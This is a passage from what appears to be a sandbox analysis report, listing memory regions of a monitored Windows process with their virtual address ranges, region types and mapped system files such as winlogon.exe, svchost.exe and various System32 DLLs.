"c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 2911 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 2912 start_va = 0x380000 end_va = 0x507fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 2913 start_va = 0x510000 end_va = 0x690fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 2914 start_va = 0x6a0000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 2915 start_va = 0x760000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 2916 start_va = 0x7a0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 2917 start_va = 0x7c0000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 2918 start_va = 0x840000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 2919 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 2920 start_va = 0x880000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 2921 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 2922 start_va = 0xa80000 end_va = 0xd4efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2923 start_va = 0xd50000 end_va = 0xdb1fff monitored = 0 entry_point = 0xd608d8 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 2924 start_va = 0xdc0000 end_va = 0xdc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 2925 start_va = 0xdd0000 end_va = 0xdd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dd0000" filename = "" Region: id = 2926 start_va = 0xde0000 end_va = 0xde0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000de0000" filename = "" Region: id = 2927 start_va = 0xdf0000 end_va = 0xdf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 2928 start_va = 0xe00000 end_va = 0xe00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 2929 start_va = 0xe10000 end_va = 0xe10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e10000" filename = "" Region: id = 2930 start_va = 0xe20000 end_va = 0xe27fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 2931 start_va = 0xe30000 end_va = 0xf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 2932 start_va = 0xf30000 end_va = 0xf30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f30000" filename = "" Region: id = 2933 start_va = 0xf40000 end_va = 0xf41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f40000" filename = "" Region: id = 2934 start_va = 0xf50000 end_va = 0xf50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f50000" filename = "" Region: id = 2935 start_va = 0xf60000 end_va = 0xfdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 2936 start_va = 0xfe0000 end_va = 0xfe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 2937 start_va = 0x1030000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 2938 start_va = 0x10b0000 end_va = 0x112ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 2939 start_va = 0x1150000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 2940 start_va = 0x1220000 end_va = 0x129ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 2941 start_va = 0x12a0000 end_va = 0x131ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 2942 start_va = 0x1330000 end_va = 0x13affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Region: id = 2943 start_va = 0x13e0000 end_va = 0x145ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013e0000" filename = "" Region: id = 2944 start_va = 0x14d0000 end_va = 0x154ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014d0000" filename = "" Region: id = 2945 start_va = 0x1550000 end_va = 0x174ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001550000" filename = "" Region: id = 2946 start_va = 0x17e0000 end_va = 0x185ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017e0000" filename = "" Region: id = 2947 start_va = 0x1870000 end_va = 0x18effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001870000" filename = "" Region: id = 2948 start_va = 0x18f0000 end_va = 0x196ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018f0000" filename = "" Region: id = 2949 start_va = 0x1990000 end_va = 0x1a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 2950 start_va = 0x1af0000 end_va = 0x1b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001af0000" filename = "" Region: id = 2951 start_va = 0x1c70000 end_va = 0x1ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 2952 start_va = 0x1cf0000 end_va = 0x20f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cf0000" filename = "" Region: id = 2953 start_va = 0x2100000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 2954 start_va = 0x25b0000 end_va = 0x262ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 2955 start_va = 0x26c0000 end_va = 0x273ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 2956 start_va = 0x2800000 end_va = 0x287ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 2957 start_va = 0x2910000 end_va = 0x298ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 2958 start_va = 0x2990000 end_va = 0x2a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 2959 start_va = 0x2aa0000 end_va = 0x2b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002aa0000" filename = "" Region: id = 2960 start_va = 0x2b20000 end_va = 0x331ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b20000" filename = "" Region: id = 2961 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2962 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2963 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2964 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2965 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2966 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2967 start_va = 0xff030000 end_va = 0xff082fff monitored = 0 entry_point = 0xff043310 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 2968 start_va = 0xff300000 end_va = 0xff30afff monitored = 0 entry_point = 0xff30246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2969 start_va = 0xff430000 end_va = 0xff491fff monitored = 0 entry_point = 0xff4408d8 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 2970 start_va = 0x7fef0ec0000 end_va = 0x7fef0f6dfff monitored = 0 entry_point = 0x7fef0ec4104 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 2971 start_va = 0x7fef10d0000 end_va = 0x7fef11f4fff monitored = 0 entry_point = 0x7fef1121570 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 2972 start_va = 0x7fef1610000 end_va = 0x7fef162bfff monitored = 0 entry_point = 0x7fef1611060 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 2973 start_va = 0x7fef50a0000 end_va = 0x7fef50b2fff monitored = 0 entry_point = 0x7fef50a1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2974 start_va = 0x7fef5310000 end_va = 0x7fef531dfff monitored = 0 entry_point = 0x7fef5315500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2975 start_va = 0x7fef5320000 end_va = 0x7fef5346fff monitored = 0 entry_point = 0x7fef53211a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 2976 start_va = 0x7fef5350000 end_va = 0x7fef5422fff monitored = 0 entry_point = 0x7fef53c8b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2977 start_va = 0x7fef56c0000 end_va = 0x7fef5736fff monitored = 0 entry_point = 0x7fef56fe7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 2978 start_va = 0x7fef7f60000 end_va = 0x7fef7f7afff monitored = 0 entry_point = 0x7fef7f61198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 2979 start_va = 0x7fef85d0000 end_va = 0x7fef861efff monitored = 0 entry_point = 0x7fef85d2760 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 2980 start_va = 0x7fef9100000 end_va = 0x7fef9117fff monitored = 0 entry_point = 0x7fef9101bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2981 start_va = 0x7fef9120000 end_va = 0x7fef9130fff monitored = 0 entry_point = 0x7fef91216ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2982 start_va = 0x7fef91e0000 end_va = 0x7fef921afff monitored = 0 entry_point = 0x7fef91e4520 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 2983 start_va = 0x7fef9220000 end_va = 0x7fef9270fff monitored = 0 entry_point = 0x7fef922f6c0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 2984 start_va = 0x7fef9290000 end_va = 0x7fef9297fff monitored = 0 entry_point = 0x7fef929284c region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 2985 start_va = 0x7fef92a0000 end_va = 0x7fef92a9fff monitored = 0 entry_point = 0x7fef92a1adc region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 2986 start_va = 0x7fefb230000 end_va = 0x7fefb23afff monitored = 0 entry_point = 0x7fefb231198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2987 start_va = 0x7fefb240000 end_va = 0x7fefb266fff monitored = 0 entry_point = 0x7fefb2498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2988 start_va = 0x7fefb6e0000 end_va = 0x7fefb6e8fff monitored = 0 entry_point = 0x7fefb6e1010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 2989 start_va = 0x7fefb6f0000 end_va = 0x7fefb71bfff monitored = 0 entry_point = 0x7fefb6f15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2990 start_va = 0x7fefb720000 end_va = 0x7fefb7cbfff monitored = 0 entry_point = 0x7fefb736acc region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 2991 start_va = 0x7fefb940000 end_va = 0x7fefb954fff monitored = 0 entry_point = 0x7fefb941050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2992 start_va = 0x7fefb960000 end_va = 0x7fefb96bfff monitored = 0 entry_point = 0x7fefb9618a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2993 start_va = 0x7fefbc60000 end_va = 0x7fefbcaafff monitored = 0 entry_point = 0x7fefbc6efcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 2994 start_va = 0x7fefc0d0000 end_va = 0x7fefc1fbfff monitored = 0 entry_point = 0x7fefc0d94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2995 start_va = 0x7fefc740000 end_va = 0x7fefc76cfff monitored = 0 entry_point = 0x7fefc741010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2996 start_va = 0x7fefc770000 end_va = 0x7fefc905fff monitored = 0 entry_point = 0x7fefc7778e4 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 2997 start_va = 0x7fefc910000 end_va = 0x7fefc91bfff monitored = 0 entry_point = 0x7fefc911064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2998 start_va = 0x7fefc920000 end_va = 0x7fefc9dafff monitored = 0 entry_point = 0x7fefc926de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2999 start_va = 0x7fefc9e0000 end_va = 0x7fefc9e6fff monitored = 0 entry_point = 0x7fefc9e14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 3000 start_va = 0x7fefcad0000 end_va = 0x7fefcaeafff monitored = 0 entry_point = 0x7fefcad2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 3001 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3002 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 3003 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3004 start_va = 0x7fefce60000 end_va = 0x7fefcebafff monitored = 0 entry_point = 0x7fefce66940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3005 start_va = 0x7fefcfd0000 end_va = 0x7fefcfd6fff monitored = 0 entry_point = 0x7fefcfd142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 3006 start_va = 0x7fefcfe0000 end_va = 0x7fefd034fff monitored = 0 entry_point = 0x7fefcfe1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3007 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3008 start_va = 0x7fefd190000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd195d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3009 start_va = 0x7fefd250000 end_va = 0x7fefd2bcfff monitored = 0 entry_point = 0x7fefd251010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 3010 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3011 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3012 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3013 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3014 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3015 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3016 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3017 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3018 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3019 start_va = 0x7fefd9e0000 end_va = 0x7fefda1afff monitored = 0 entry_point = 0x7fefd9e1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 3020 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3021 start_va = 0x7fefda60000 end_va = 0x7fefda79fff monitored = 0 entry_point = 0x7fefda61558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 3022 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3023 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3024 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3025 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3026 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3027 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3028 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3029 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3030 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3031 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 3032 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3033 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3034 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3035 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3036 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3037 start_va = 0x7feff680000 end_va = 0x7feff856fff monitored = 0 entry_point = 0x7feff681010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 3038 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3039 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3040 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 3041 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 3042 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 3043 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 3044 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 3045 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 3046 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 3047 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 3048 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 3049 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 3050 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 3051 start_va = 